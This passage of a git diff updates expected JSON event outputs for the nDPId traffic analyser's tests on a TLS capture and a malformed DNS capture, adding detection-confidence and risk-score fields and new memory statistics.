-00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}}
+00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+05058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}}
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}}
 00169{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 47/47
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4993460 bytes
-~~ total memory freed........: 4993460 bytes
-~~ total allocations/frees...: 99793/99793
+~~ total memory allocated....: 5078413 bytes
+~~ total memory freed........: 5078413 bytes
+~~ total allocations/frees...: 101383/101383
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 174 chars
-~~ json string max len.......: 5037 chars
-~~ json string avg len.......: 2411 chars
+~~ json string max len.......: 5063 chars
+~~ json string avg len.......: 2423 chars
diff --git a/test/results/malformed_dns.pcap.out b/test/results/malformed_dns.pcap.out
index 3c7181871..e42543822 100644
--- a/test/results/malformed_dns.pcap.out
+++ b/test/results/malformed_dns.pcap.out
@@ -1,11 +1,11 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"malformed_dns.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591551760342,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1591551760342,"pkt":"AAAAAAAAAAAAAAAACABFAAA4nToAAEAR33h\/AAABfwAAAcUDADUAJP43hLQBAAABAAAAAAAAA3d3dwJ4dANjb20AAAEAAQ=="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591551760357,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"ts_msec":1591551760357,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="}
-00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}}
+00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}}
 02643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591551760372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"ts_msec":1591551760372,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="}
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00791{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6/6
@@ -15,9 +15,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595003 bytes
-~~ total memory freed........: 4595003 bytes
-~~ total allocations/frees...: 99559/99559
+~~ total memory allocated....: 4679956 bytes
+~~ total memory freed........: 4679956 bytes
+~~ total allocations/frees...: 101149/101149
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2648 chars
